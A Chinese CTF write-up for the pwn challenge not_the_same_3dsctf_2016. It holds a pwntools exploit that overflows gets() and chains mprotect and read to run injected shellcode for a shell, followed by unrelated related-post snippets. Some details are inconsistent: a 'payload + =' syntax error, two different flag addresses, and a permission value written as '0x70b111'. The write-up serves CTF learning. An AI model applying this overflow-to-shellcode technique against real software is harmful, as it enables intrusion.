buu not_the_same_3dsctf_2016

最新推荐文章于 2023-12-03 16:46:29 发布
最新推荐文章于 2023-12-03 16:46:29 发布
阅读量185 收藏
点赞数
文章标签: 信息安全 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51298357/article/details/113420515
版权

buu not_the_same_3dsctf_2016

刚拿到题

刚打开的时候很懵,main函数里只有一个fopen函数和一个fgets函数,点半天也没查到什么。没有办法,shift+f12 :查看程序内的字符串,发现了flag.txt

双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置。我们找到了flag的位置。接下来就要尝试把它读取出来就好了。

到这里,结合一开始看见的gets函数,得到了第一个思路:利用gets函数覆盖返回地址去读出flag → 利用get_secret函数覆盖地址到write函数的地址,打印unk_80CF91B里面的flag.txt。

但是这个方法不行,主要原因有以下几点:

  • fgets函数能够避免溢出
  • fl4g在bss段内,没有ret指令可以继续控制程序

后来在程序了发现了mprotect函数,可以用它来修改我们内存栈的权限,让它可读可写可执行,接着让写入shellcode,然后执行获取shell

from pwn import *

context(log_level='debug', arch='i386')

proc_name = './not_the_same_3dsctf_2016'
p = process(proc_name)
elf = ELF(proc_name)
bss_start_addr = elf.bss() & ~(elf.bss() % 0x1000)
mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
# 0x080483b8 : pop esi ; pop edi ; pop ebp ; ret
pop = 0x080483b8
payload = 'a'.encode() * (0x2d) + p32(mprotect_addr) 
payload + = p32(pop) + p32(bss_start_addr) + p32(0x100) 
payload + = p32(0x7) + p32(read_addr) + p32(bss_start_addr) 
payload + = p32(0) + p32(bss_start_addr) + p32(0x100)
p.sendline(payload)
payload1 = asm(shellcraft.sh())
p.sendline(payload1)
p.interactive()
  • 首先0x2d是main函数中栈空间的大小,它的下一个位置就是ret指令对应的返回地址了
  • p32(mprotect_addr)就是mprotect函数的地址,接下来的p32(pop)是为了保持栈平衡而将后面压入的三个参数从栈上弹出,弹出后我们并不使用它,就是为了控制栈的结构,p32(pop)的位置也同样是执行完mprotect后的返回地址,pop对应的指令为pop esi ; pop edi ; pop ebp ; ret,最后ret就跳转到p32(read_addr)这里了
  • 最后,p32(read_addr)的下一个p32(bss_start_addr)也是执行完read函数后跳转的地址,后面是read的三个参数

整个思路就是,利用mprotect函数修改bss段为0x70b111,可读可写可执行权限,然后利用read函数读入shellcode,最后跳转到shellcode的位置,就成功拿到shell了

白日梦-想家
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3737
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 322
BUUCTF - PWN】not_the_same_3dsctf_2016题解
not_the_same_3dsctf_2016 wp (python3)
Kata_Jhin的博客
03-14 139
not_the_same_3dsctf_2016 wp (python3)
not_the_same_3dsctf_2016【简单解法和mprotect解法】
qq_41696518的博客
08-29 665
not_the_same_3dsctf_2016,含mprotect解法和常规解法
not_the_same_3dsctf_2016
m0_52231248的博客
11-09 190
not_the_same_3dsctf_2016 Ubuntu16 checksec一下 ida: Gets函数存在溢出点offest=0x2d Main函数上面就是后门函数,给我们将flag.txt读入bss段 找到读入的flag地址 我们只需要printf打印一下就行了 远端还需要我们正常退出函数,找一下exit() 因为是静态编译的,所以基本所有函数都会有直接构造exp: from pwn import* context(log_level="deb.
cipher_CIPHER_
09-29
this is document for Hi3520D
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1580
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1201
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 183
本题目本地与远程得用两种方案打。
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 728
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
[BUUCTF]-PWN:not_the_same_3dsctf_2016解析
最新发布
2301_79326813的博客
12-03 395
答:这里跟exit没有太大关系,不是exit也行,但printf和flag_addr的隔一个是printf函数在32位的调用规则,也就是通过栈传参,64位与32位不同,64位是前6个参数通过寄存器传参,因此payload的书写也不同,这个需要注意。答:printf从缓冲区打印出东西需要满足条件,比如有换行符或缓冲区已满或程序退出,如果不满足条件flag无法被打印出来。答:因为这里没有rbp,在main函数的汇编界面就可以看到程序并没有把rbp推入,所以不用覆盖rbp。问题1:为什么填充45个字符?
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 292
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
pwn刷题记录之not_the_same_3dsctf_2016
m0_64195960的博客
06-22 224
前言:这道题目有一个没见过的姿势,写一篇来记录一下开了栈不可执行保护发现了gets()函数存在栈溢出我们发现 flag.txt被存在了那个&unk.....里面然后fgets函数是不能实现栈溢出的,不然可以考虑栈溢出然后用write函数读这块区域这里补充一下ida的小操作,我们可以把鼠标放在左侧函数名称列表这里,按ctrl+f可以搜索函数名在Linux中,mprotect()函数可以用来修改一段指定内存区域的保护属性。函数原型如下:#include #include ...
buu crackrtf
09-26
BUU CrackRTF是一个密码破解题目,其中涉及到了...3. 将获取到的数据和输入的密码进行异或操作,得到解密后的字符串。 请注意,以上步骤仅仅是对代码进行分析后的一种破解思路,具体操作还需要根据实际情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值